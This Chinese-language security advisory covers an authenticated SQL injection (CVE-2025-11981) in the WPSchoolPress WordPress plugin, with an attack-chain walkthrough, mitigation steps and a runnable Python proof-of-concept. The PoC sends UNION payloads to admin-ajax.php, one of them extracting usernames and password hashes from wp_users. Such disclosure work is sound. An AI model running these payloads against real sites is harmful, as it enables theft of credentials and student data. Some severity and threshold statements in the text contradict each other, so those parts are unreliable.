CVE-2025-11981 WordPress WPSchoolPress插件SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-11981

漏洞类型

SQL注入

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

WordPress WPSchoolPress插件

漏洞概述

CVE-2025-11981是WordPress平台下School Management System（学校管理系统）插件WPSchoolPress中的一个高危安全漏洞。该插件是一款广泛应用于教育机构网站的内容管理工具，用于管理学生信息、课程安排、教师资料等敏感数据。漏洞存在于插件的ajax处理逻辑中，具体是由于对用户提交的'SCodes'参数缺乏充分的输入验证和SQL语句预处理。攻击者利用该漏洞可以在拥有管理员级别权限的情况下，向现有的SQL查询中注入恶意的SQL代码片段，从而实现对数据库中敏感信息的非法访问和窃取。鉴于学校管理系统通常存储大量学生个人信息、成绩数据、联系方式等隐私数据，该漏洞的潜在危害不容忽视。攻击者可能利用获取的数据进行身份盗窃、欺诈活动或其他恶意行为。此外，成功的SQL注入还可能导致数据库被篡改或破坏，影响系统的正常运行和数据完整性。

技术细节

该SQL注入漏洞的根本原因在于WPSchoolPress插件的wpsp-ajaxworks.php文件中对'SCodes'参数的处理存在安全缺陷。具体问题表现为两个方面：首先是输入验证不足，插件直接接收用户提交的'SCodes'参数而未进行严格的过滤和转义处理；其次是SQL查询预处理缺失，动态拼接用户输入到SQL语句中而未使用参数化查询或预编译语句。在WordPress插件的AJAX请求处理流程中，攻击者可以通过构造特殊的请求payload，将恶意的SQL代码片段附加到正常的数据库查询语句之后。由于数据库执行时会依次处理拼接后的完整SQL语句，攻击者注入的SQL代码将被执行，从而实现数据提取或其他数据库操作。漏洞的利用需要攻击者具备管理员级别或更高的WordPress账号权限，这降低了漏洞被利用的门槛，因为许多学校网站的管理员账号安全意识可能不足。攻击者可以通过该漏洞提取用户表中的密码哈希、邮箱地址、个人信息等敏感数据，甚至可能通过UNION注入等技术获取整个数据库的内容。

攻击链分析

STEP 1

步骤1

攻击者获取目标WordPress网站的管理员级别账户凭据，可能通过钓鱼、暴力破解、凭据填充或利用其他漏洞实现

STEP 2

步骤2

攻击者构造包含恶意SQL代码的SCodes参数payload，典型方式是在参数值后附加UNION SELECT语句或布尔型盲注探测代码

STEP 3

步骤3

攻击者向wp-admin/admin-ajax.php端点发送AJAX请求，将构造的payload作为SCodes参数值传递，触发wpsp_GetSCodes AJAX动作

STEP 4

步骤4

插件接收到SCodes参数后，由于缺乏输入过滤和SQL预处理，恶意代码直接被拼接到原始SQL查询语句中

STEP 5

步骤5

数据库服务器执行包含注入代码的完整SQL语句，攻击者的恶意查询逻辑被执行，实现数据提取或验证

STEP 6

步骤6

攻击者通过分析响应内容或响应时间差异，逐步提取数据库中的敏感信息，如用户账户、密码哈希、配置数据等

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys
from urllib.parse import urlencode

# CVE-2025-11981 PoC - WPSchoolPress SQL Injection
# Target: WordPress site with WPSchoolPress plugin <= 2.2.23
# Authentication required: Administrator or higher privilege

def exploit_sql_injection(target_url, admin_cookie):
    """
    Exploit SQL injection in WPSchoolPress SCodes parameter
    
    Args:
        target_url: Base URL of the WordPress site
        admin_cookie: Valid admin session cookie
    
    Returns:
        Extracted database information
    """
    
    # Vulnerable endpoint
    endpoint = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Malicious payload to extract database user
    # The SCodes parameter is directly concatenated into SQL query
    payload = "1' UNION SELECT user()-- "
    
    headers = {
        'Cookie': admin_cookie,
        'Content-Type': 'application/x-www-form-urlencoded',
        'X-Requested-With': 'XMLHttpRequest'
    }
    
    # Build the request data
    data = {
        'action': 'wpsp_GetSCodes',  # AJAX action name
        'SCodes': payload
    }
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Sending malicious request...")
    print(f"[*] Payload: {payload}")
    
    try:
        response = requests.post(endpoint, headers=headers, data=data, timeout=30)
        
        if response.status_code == 200:
            print(f"[+] Request sent successfully")
            print(f"[+] Response status: {response.status_code}")
            print(f"[+] Response preview: {response.text[:500]}")
            return response.text
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return None
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

def extract_users(target_url, admin_cookie):
    """
    Extract WordPress users via SQL injection
    """
    endpoint = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Payload to extract user_login and user_pass from wp_users table
    payload = "1' UNION SELECT CONCAT(user_login,':',user_pass) FROM wp_users-- "
    
    headers = {
        'Cookie': admin_cookie,
        'Content-Type': 'application/x-www-form-urlencoded',
        'X-Requested-With': 'XMLHttpRequest'
    }
    
    data = {
        'action': 'wpsp_GetSCodes',
        'SCodes': payload
    }
    
    try:
        response = requests.post(endpoint, headers=headers, data=data, timeout=30)
        return response.text
    except:
        return None

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-11981.py <target_url> <admin_cookie>")
        print("Example: python cve-2025-11981.py http://example.com 'wordpress_logged_in_xxx='")
        sys.exit(1)
    
    target = sys.argv[1]
    cookie = sys.argv[2]
    
    print("=" * 60)
    print("CVE-2025-11981 - WPSchoolPress SQL Injection Exploit")
    print("=" * 60)
    
    exploit_sql_injection(target, cookie)

影响范围

WPSchoolPress < 2.2.24

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1) 限制wp-admin目录的访问权限，仅允许受信任的IP地址访问管理后台；2) 更改所有WordPress管理员账户的密码，使用强密码策略；3) 启用双因素认证增强管理员账户安全性；4) 监控服务器日志和数据库访问日志，关注异常的SQL查询行为；5) 考虑暂时禁用WPSchoolPress插件或相关功能模块，直到完成安全更新。同时建议对WordPress网站进行全面安全检查，确认是否存在其他潜在的安全漏洞。